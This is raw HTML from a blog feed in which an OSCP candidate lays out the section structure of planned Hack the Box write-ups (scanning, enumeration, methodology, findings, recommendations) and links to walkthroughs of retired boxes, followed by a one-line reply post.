https://substackcdn.com/image/fetch/$s_!Je98!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Je98!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Je98!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Je98!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Hack the Box logo (all rights to www.hackthebox.eu)&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Hack the Box logo (all rights to www.hackthebox.eu)" title="Hack the Box logo (all rights to www.hackthebox.eu)" srcset="https://substackcdn.com/image/fetch/$s_!Je98!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Je98!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Je98!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Je98!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>As many of you know, I am actively working on my <a href="https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/">Offensive Security Certified Professional (OSCP)</a> and have unsuccessfully attempted the exam once. In concert with a few friends in <a href="http://dc865.org/">dc865</a>, I am working through several Hack the Box systems to get more comfortable with the process and better prepared for OSCP.</p><p>I am going to do more thorough write-ups on each box I do and publishing them a) immediately if they are retired; or b) as soon as they are retired. This will help others understand the process to pwn a system while helping me stay sharp with the verbosity level required to pass the exam. This could also serve as a roadmap as to how to write up a system for professional work in addition to hobbies and certification. I plan on writing systems up with the following sections (for both user and root; those marked with an asterisk [*] are not required for OSCP reporting - also note that this is out of order for OSCP):</p><h3><em>Port Scan Results*</em></h3><p>Here, I will share what I was able to find through my port scanning. I will also share the specific scan commands, switches, and syntax that I used. I will use this as a segue to talk about the enumeration phase, which is the next section.</p><h3>Further Enumeration*</h3><p>This is where I will talk about my initial enumeration beyond port scanning. This could include OSINT, web page crawling, and other tools. This is the section that most highly-successful penetration testers and red-teamers have told me to focus the majority of my time.</p><h3>Methodology</h3><p>Here, I will explain how I got to the point of gaining access and the flags. I will also discuss any red herrings and pitfalls that I encountered as well as my thought processes going in. The flags and code will be in the next section.</p><h3>Findings, Sample Code, and Flags</h3><p>This is where I will discuss the actual pwnage. I will share any code that I wrote or modified and how I got the flags. I will not share the actual flags, go find them yourself -<em><strong>Try Harder!</strong></em></p><h3>Additional Actions</h3><p>I reserve this for any additional information. In an actual report, this would be a good section to talk about pivoting in. If anything of importance doesn&#8217;t fit another category, put it here.</p><h3>High-Level Summary and Recommendations</h3><p>This is where I will discuss the system, what is wrong, and what management should do (but in business terms). It is just as (if not more) important to be able to explain to someone in a non-technical role how you accomplished something and why the current settings are a problem. While we do typically write for a technical audience, we have to remember that they have non-technical people that they answer to.</p><h3>Tools Used</h3><p>Here, I will discuss which tools I used and for what.</p><p>For this, I used Medium :-)</p><p>See you soon, after I pop some shells!</p><p>Walkthroughs:</p><p><a href="https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560">Arctic</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-blue-7fe9eb09d15">Blue</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-lame-5cf414d1c523">Lame</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-legacy-147bbcc9ff02">Legacy</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-mirai-83b22174f03b">Mirai</a></p>]]></content:encoded></item><item><title><![CDATA[Bravo! I cannot agree more!]]></title><description><![CDATA[Bravo!]]></description><link>https://tidbit.theosintion.com/p/bravo-i-cannot-agree-more-e63baff9c9dd</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/bravo-i-cannot-agree-more-e63baff9c9dd</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Mon, 21 Jan 2019 09:46:46 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!v8Rt!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F25f3dc9f-fdc6-436f-bba0-ba78284de737_400x400.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Bravo! I cannot agree more!</p>]]></content:encoded></item></channel></rss>